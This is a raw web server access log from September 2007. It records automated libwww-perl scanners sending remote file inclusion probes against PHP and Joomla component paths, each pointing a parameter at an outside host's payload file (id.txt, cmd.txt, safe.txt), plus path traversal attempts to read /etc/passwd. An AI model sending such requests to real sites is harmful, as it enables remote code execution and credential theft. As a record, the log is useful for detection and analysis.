195.42.160.22 - - [30/Sep/2007:19:40:37 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
59.105.190.105 - - [30/Sep/2007:19:41:28 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.105.190.105 - - [30/Sep/2007:19:41:29 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:42:01 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
66.235.184.41 - - [30/Sep/2007:19:42:01 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
212.241.215.190 - - [30/Sep/2007:19:42:55 -0700] "GET //contrib/mx_glance_sdesc.php?mx_root_path=http://racrew.us/source/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.146.86.2 - - [30/Sep/2007:19:43:48 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [30/Sep/2007:19:43:48 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:44:48 -0700] "GET /logs/access_070806.log/index.php?go=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:19:45:23 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:19:45:24 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:19:45:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:19:45:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.214.20.213 - - [30/Sep/2007:19:45:42 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.20.213 - - [30/Sep/2007:19:45:42 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.14.74.20 - - [30/Sep/2007:19:46:18 -0700] "GET /logs/!scanhttp://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.14.74.20 - - [30/Sep/2007:19:46:18 -0700] "GET /!scanhttp://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.216.213.40 - - [30/Sep/2007:19:47:18 -0700] "GET //contrib/mx_glance_sdesc.php?mx_root_path=http://racrew.us/source/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.72.112.111 - - [30/Sep/2007:19:47:39 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.111 - - [30/Sep/2007:19:47:39 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.111 - - [30/Sep/2007:19:47:39 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
81.20.85.68 - - [30/Sep/2007:19:48:12 -0700] "GET //stats/modules/My_eGallery/index.php?basepath=http://servercom1245.tripod.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.8.221.178 - - [30/Sep/2007:19:48:34 -0700] "GET /index2.php?url_page=http://h1.ripway.com/s4w/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [30/Sep/2007:19:48:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [30/Sep/2007:19:48:36 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.235.184.41 - - [30/Sep/2007:19:49:28 -0700] "GET /logs/access.log/components/com_jim/install.jim.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.241.215.190 - - [30/Sep/2007:19:49:39 -0700] "GET /logs/access_070716.log//contrib/mx_glance_sdesc.php?mx_root_path=http://racrew.us/source/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.215.190 - - [30/Sep/2007:19:49:40 -0700] "GET /logs//contrib/mx_glance_sdesc.php?mx_root_path=http://racrew.us/source/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.8.221.178 - - [30/Sep/2007:19:50:05 -0700] "GET /index2.php?url_page=http://h1.ripway.com/s4w/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.8.221.178 - - [30/Sep/2007:19:50:06 -0700] "GET /index2.php?x=http://h1.ripway.com/s4w/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:19:50:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:19:50:19 -0700] "GET /logs/access_070716.log/admin/spaw/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.249.44.92 - - [30/Sep/2007:19:50:19 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.44.92 - - [30/Sep/2007:19:50:19 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
203.255.227.30 - - [30/Sep/2007:19:50:54 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:50:55 -0700] "GET /index2.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:50:55 -0700] "GET /logs/index2.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:52:03 -0700] "GET /logs/access_070806.log/index2.php?x=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:52:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.113.240.10 - - [30/Sep/2007:19:52:29 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
211.172.232.89 - - [30/Sep/2007:19:52:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.info-manni.de/phpAdsNew/admin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.113.240.10 - - [30/Sep/2007:19:52:29 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.113.240.10 - - [30/Sep/2007:19:53:53 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
217.113.240.10 - - [30/Sep/2007:19:53:53 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
203.255.227.30 - - [30/Sep/2007:19:54:07 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:54:11 -0700] "GET /logs//components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.235.184.41 - - [30/Sep/2007:19:54:11 -0700] "GET //components/com_mmp/help.mmp.php?mosConfig_absolute_path=http://www.ohmnightlife.com/images/ec.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:54:20 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:54:20 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:54:20 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
203.255.227.30 - - [30/Sep/2007:19:55:36 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:55:37 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:55:37 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
64.72.112.111 - - [30/Sep/2007:19:56:00 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
64.72.112.111 - - [30/Sep/2007:19:56:00 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.111 - - [30/Sep/2007:19:56:01 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.69mb.net/users/cmdgroup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:56:05 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.30.216.100 - - [30/Sep/2007:19:56:12 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.62.7.50 - - [30/Sep/2007:19:56:29 -0700] "GET /logs/access_070716.log/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [30/Sep/2007:19:56:29 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [30/Sep/2007:19:56:29 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:57:46 -0700] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:57:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:57:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:19:59:56 -0700] "GET /logs/access_070910.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
216.180.243.82 - - [30/Sep/2007:20:00:29 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:20:00:35 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:20:00:43 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:20:01:47 -0700] "GET /logs/index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:20:01:47 -0700] "GET /index.php?p=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.47.36.44 - - [30/Sep/2007:20:02:28 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://personal.rwcinc.net/showfile.php?file=id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.47.36.44 - - [30/Sep/2007:20:02:28 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://personal.rwcinc.net/showfile.php?file=id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.47.36.44 - - [30/Sep/2007:20:02:52 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://personal.rwcinc.net/showfile.php?file=id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.47.36.44 - - [30/Sep/2007:20:02:53 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://personal.rwcinc.net/showfile.php?file=id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.47.36.44 - - [30/Sep/2007:20:03:34 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://personal.rwcinc.net/showfile.php?file=id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.47.36.44 - - [30/Sep/2007:20:03:34 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://personal.rwcinc.net/showfile.php?file=id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.213.40 - - [30/Sep/2007:20:03:45 -0700] "GET /logs/access_070716.log//contrib/mx_glance_sdesc.php?mx_root_path=http://racrew.us/source/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.213.40 - - [30/Sep/2007:20:03:46 -0700] "GET /logs//contrib/mx_glance_sdesc.php?mx_root_path=http://racrew.us/source/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
12.22.179.203 - - [30/Sep/2007:20:04:05 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "galf.org"
12.22.179.203 - - [30/Sep/2007:20:04:05 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "galf.org"
12.22.179.203 - - [30/Sep/2007:20:04:28 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
12.22.179.203 - - [30/Sep/2007:20:04:28 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
12.22.179.203 - - [30/Sep/2007:20:04:45 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
12.22.179.203 - - [30/Sep/2007:20:04:45 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:05:19 -0700] "GET /logs/access_070702.log/modules/My_eGallery/index.php?basepath=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:05:20 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
203.255.227.30 - - [30/Sep/2007:20:05:20 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
81.20.85.68 - - [30/Sep/2007:20:05:36 -0700] "GET /logs/access_070702.log//stats/modules/My_eGallery/index.php?basepath=http://servercom1245.tripod.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.20.85.68 - - [30/Sep/2007:20:05:36 -0700] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://servercom1245.tripod.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.20.85.68 - - [30/Sep/2007:20:05:38 -0700] "GET /logs/access_070618.log//stats/modules/My_eGallery/index.php?basepath=http://servercom1245.tripod.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:20:05:50 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.180.243.82 - - [30/Sep/2007:20:05:51 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:06:02 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:06:03 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:06:03 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
203.255.227.30 - - [30/Sep/2007:20:06:07 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://www.wii-brasil.com/forum/arcade/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
64.14.74.20 - - [30/Sep/2007:20:06:31 -0700] "GET /logs/access.log/!scanhttp://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.14.74.20 - - [30/Sep/2007:20:06:58 -0700] "GET /logs/access_070910.log/!scanhttp://www.flylink.psi.br/arquivos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.22.179.203 - - [30/Sep/2007:20:06:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
12.22.179.203 - - [30/Sep/2007:20:07:17 -0700] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "galf.org"
12.22.179.203 - - [30/Sep/2007:20:07:17 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.skillbrindes.com.br/admin/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "galf.org"
190.8.72.154 - - [30/Sep/2007:20:08:18 -0700] "GET /logs/index2.php?pag=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.33.227.4 - - [30/Sep/2007:20:08:19 -0700] "GET /index.php?get=http://www.godsteam.org/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.8.72.154 - - [30/Sep/2007:20:08:23 -0700] "GET /index2.php?pag=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:20:09:32 -0700] "GET /logs/access_070827.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:20:10:09 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:20:10:09 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:20:10:13 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:20:10:14 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.47.60.170 - - [30/Sep/2007:20:10:25 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.20.213 - - [30/Sep/2007:20:10:27 -0700] "GET /logs/access.log/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.20.213 - - [30/Sep/2007:20:10:51 -0700] "GET /logs/access_070910.log/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.20.85.68 - - [30/Sep/2007:20:10:55 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://servercom1245.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.20.85.68 - - [30/Sep/2007:20:10:56 -0700] "GET //components/com_minibb.php?absolute_path=http://servercom1245.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:20:11:24 -0700] "GET /logs/access_070806.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.8.72.154 - - [30/Sep/2007:20:11:45 -0700] "GET /logs/access_070806.log/index2.php?pag=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.8.72.154 - - [30/Sep/2007:20:11:51 -0700] "GET /index2.php?pag=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.8.72.154 - - [30/Sep/2007:20:11:57 -0700] "GET /logs/index2.php?pag=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
216.180.243.82 - - [30/Sep/2007:20:12:13 -0700] "GET /logs/access_070910.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.180.243.82 - - [30/Sep/2007:20:12:16 -0700] "GET /logs/access_070618.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dj-donshanto.com/toplist/banners/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:13:56 -0700] "GET /logs/access_070702.log//stats/modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:13:56 -0700] "GET //stats/modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.201.104.13 - - [30/Sep/2007:20:13:56 -0700] "GET /logs//stats/modules/My_eGallery/index.php?basepath=http://mr-general.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
